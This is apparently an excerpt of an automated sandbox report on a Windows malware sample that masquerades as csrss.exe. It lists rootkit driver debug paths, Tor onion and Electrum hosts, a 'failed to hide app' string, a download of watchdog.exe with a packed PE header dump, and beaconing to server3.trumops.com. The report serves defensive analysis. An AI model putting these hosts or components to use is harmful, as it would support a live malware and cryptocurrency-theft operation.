            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.334492688.0000000006803000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000021.00000003.364615971.0000000006803000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Nov 2021 19:35:48 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 2147Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZbZWdjamI%2BOlW6zrBCfymBq%2F3EM7AYENiKBU5VEfeBk8QwcSprlzIdARZfp9OhwkDRq0Hl79ZYMAk3bYiIZL5RRTbInTH8PueogXJMbnQaAbXXgXKMt2qHIOXr8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6ac9f742f94b4e19-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M @
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server3.trumops.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/80.0.3987.87 Chrome/80.0.3987.87 Safari/537.36Content-Length: 652Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server3.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Content-Length: 668Accept-Encoding: gzip
            Source: csrss.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://builtwith.com/biup)
            Source: 1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpString found in binary or memory: http://crl.g
            Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000032.00000002.439042588.00000000009F9000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
